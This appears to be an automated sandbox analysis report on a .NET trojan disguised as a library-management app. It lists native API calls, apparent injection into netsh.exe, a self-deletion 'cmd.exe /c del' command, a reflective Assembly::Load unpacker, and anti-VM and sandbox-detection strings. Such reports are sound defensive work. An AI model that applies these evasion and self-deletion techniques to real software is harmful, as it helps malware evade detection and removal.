          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029610 NtEnumerateValueKey,2_2_01029610
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029650 NtQueryValueKey,2_2_01029650
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029670 NtQueryInformationProcess,2_2_01029670
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010296D0 NtCreateKey,2_2_010296D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809A50 NtCreateFile,LdrInitializeThunk,12_2_03809A50
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038099A0 NtCreateSection,LdrInitializeThunk,12_2_038099A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809910 NtAdjustPrivilegesToken,LdrInitializeThunk,12_2_03809910
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809840 NtDelayExecution,LdrInitializeThunk,12_2_03809840
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809860 NtQuerySystemInformation,LdrInitializeThunk,12_2_03809860
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809780 NtMapViewOfSection,LdrInitializeThunk,12_2_03809780
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809FE0 NtCreateMutant,LdrInitializeThunk,12_2_03809FE0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809710 NtQueryInformationToken,LdrInitializeThunk,12_2_03809710
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038096D0 NtCreateKey,LdrInitializeThunk,12_2_038096D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038096E0 NtFreeVirtualMemory,LdrInitializeThunk,12_2_038096E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038095D0 NtClose,LdrInitializeThunk,12_2_038095D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809540 NtReadFile,LdrInitializeThunk,12_2_03809540
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0380A3B0 NtGetContextThread,12_2_0380A3B0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809B00 NtSetValueKey,12_2_03809B00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809A80 NtOpenDirectoryObject,12_2_03809A80
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809A00 NtProtectVirtualMemory,12_2_03809A00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809A10 NtQuerySection,12_2_03809A10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809A20 NtResumeThread,12_2_03809A20
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038099D0 NtCreateProcessEx,12_2_038099D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809950 NtQueueApcThread,12_2_03809950
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038098A0 NtWriteVirtualMemory,12_2_038098A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038098F0 NtReadVirtualMemory,12_2_038098F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809820 NtEnumerateKey,12_2_03809820
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0380B040 NtSuspendThread,12_2_0380B040
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038097A0 NtUnmapViewOfSection,12_2_038097A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0380A710 NtOpenProcessToken,12_2_0380A710
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809730 NtQueryVirtualMemory,12_2_03809730
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809760 NtOpenProcess,12_2_03809760
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0380A770 NtOpenThread,12_2_0380A770
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809770 NtSetInformationFile,12_2_03809770
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809610 NtEnumerateValueKey,12_2_03809610
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809650 NtQueryValueKey,12_2_03809650
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809660 NtAllocateVirtualMemory,12_2_03809660
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809670 NtQueryInformationProcess,12_2_03809670
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038095F0 NtQueryInformationFile,12_2_038095F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809520 NtWaitForSingleObject,12_2_03809520
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0380AD30 NtSetContextThread,12_2_0380AD30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03809560 NtWriteFile,12_2_03809560
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DD8690 NtReadFile,12_2_02DD8690
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DD8710 NtClose,12_2_02DD8710
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DD85E0 NtCreateFile,12_2_02DD85E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DD870C NtReadFile,NtClose,12_2_02DD870C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DD85DA NtCreateFile,12_2_02DD85DA
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.358021001.0000000003BDD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000000.342497076.0000000000950000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIVectorVi.exe. vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.359712250.0000000005B10000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.360053021.00000000060A0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000001.00000000.351201212.0000000000360000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIVectorVi.exe. vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000002.00000000.354123685.00000000005D0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIVectorVi.exe. vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434367747.00000000010DF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434893300.0000000002FCC000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434541337.000000000126F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exeBinary or memory string: OriginalFilenameIVectorVi.exe. vs cK1g5gckZR9VHjj.exe
          Source: cK1g5gckZR9VHjj.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeFile read: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe:Zone.IdentifierJump to behavior
          Source: cK1g5gckZR9VHjj.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\cK1g5gckZR9VHjj.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/1@7/4
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6992:120:WilError_01
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: /IVectorVi;component/views/addbook.xaml
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: views/addbook.baml
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: views/addcustomer.baml
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: /IVectorVi;component/views/addcustomer.xaml
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: /IVectorVi;component/views/addbook.xaml
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: views/addcustomer.baml
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: views/addbook.baml
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: /IVectorVi;component/views/addcustomer.xaml
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: /IVectorVi;component/views/addbook.xaml
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: views/addbook.baml
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: views/addcustomer.baml
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: /IVectorVi;component/views/addcustomer.xaml
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: O/IVectorVi;component/views/addbook.xamle/IVectorVi;component/views/borrowfrombookview.xaml[/IVectorVi;component/views/borrowingview.xamlU/IVectorVi;component/views/changebook.xaml]/IVectorVi;component/views/changecustomer.xamlY/IVectorVi;component/views/customerview.xaml]/IVectorVi;component/views/deletecustomer.xamlS/IVectorVi;component/views/errorview.xamlW/IVectorVi;component/views/smallextras.xamlW/IVectorVi;component/views/addcustomer.xaml
          Source: cK1g5gckZR9VHjj.exeString found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: cK1g5gckZR9VHjj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: cK1g5gckZR9VHjj.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netsh.pdb source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434873438.0000000002FB0000.00000040.00020000.sdmp
          Source: Binary string: netsh.pdbGCTL source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434873438.0000000002FB0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434367747.00000000010DF000.00000040.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: cK1g5gckZR9VHjj.exe, cK1g5gckZR9VHjj.exe, 00000002.00000002.434367747.00000000010DF000.00000040.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, netsh.exe, netsh.exe, 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: cK1g5gckZR9VHjj.exe, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.cK1g5gckZR9VHjj.exe.8e0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.cK1g5gckZR9VHjj.exe.8e0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.cK1g5gckZR9VHjj.exe.2f0000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.cK1g5gckZR9VHjj.exe.2f0000.3.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.cK1g5gckZR9VHjj.exe.2f0000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.2.cK1g5gckZR9VHjj.exe.2f0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.cK1g5gckZR9VHjj.exe.2f0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.cK1g5gckZR9VHjj.exe.560000.7.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.cK1g5gckZR9VHjj.exe.560000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.cK1g5gckZR9VHjj.exe.560000.5.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.2.cK1g5gckZR9VHjj.exe.560000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.cK1g5gckZR9VHjj.exe.560000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.cK1g5gckZR9VHjj.exe.560000.9.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.cK1g5gckZR9VHjj.exe.560000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 0_2_008E92F5 push ds; ret 0_2_008E9340
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 0_2_008E9347 push ds; ret 0_2_008E934C
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 0_2_008E9361 push ds; retf 0_2_008E9364
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 0_2_053856E0 push esp; iretd 0_2_053856E9
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 1_2_002F9361 push ds; retf 1_2_002F9364
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 1_2_002F9347 push ds; ret 1_2_002F934C
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 1_2_002F92F5 push ds; ret 1_2_002F9340
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0041B822 push eax; ret 2_2_0041B828
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0041B82B push eax; ret 2_2_0041B892
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0041B88C push eax; ret 2_2_0041B892
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_004153E6 push ss; iretd 2_2_004153EC
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0041541E push ss; iretd 2_2_004153EC
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0041B7D5 push eax; ret 2_2_0041B828
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_005692F5 push ds; ret 2_2_00569340
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00569347 push ds; ret 2_2_0056934C
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00569361 push ds; retf 2_2_00569364
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0103D0D1 push ecx; ret 2_2_0103D0E4
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0381D0D1 push ecx; ret 12_2_0381D0E4
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DD53E6 push ss; iretd 12_2_02DD53EC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DDB88C push eax; ret 12_2_02DDB892
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DDB82B push eax; ret 12_2_02DDB892
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DDB822 push eax; ret 12_2_02DDB828
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DDB7D5 push eax; ret 12_2_02DDB828
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DD541E push ss; iretd 12_2_02DD53EC
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85526570093

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: /c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: /c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 0.2.cK1g5gckZR9VHjj.exe.2c38e9c.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.cK1g5gckZR9VHjj.exe.2ccaf94.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: cK1g5gckZR9VHjj.exe PID: 7160, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
